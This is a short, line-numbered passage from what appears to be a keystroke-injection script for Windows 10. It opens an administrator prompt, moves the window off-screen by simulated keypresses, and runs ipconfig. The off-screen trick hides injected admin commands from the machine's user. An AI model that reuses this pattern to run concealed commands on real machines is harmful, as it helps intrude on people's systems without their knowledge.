win10AsAdmin(); 13 | delay(1000); 14 | press("ALT SPACE m"); 15 | delay(500); 16 | for (var i = 0; i<100; i++){ 17 | press("down")+i 18 | } 19 | press("ENTER"); 20 | type("ipconfig"); 21 | press("ENTER"); 22 | delay(1000); 23 | --------------------------------------------------------------------------------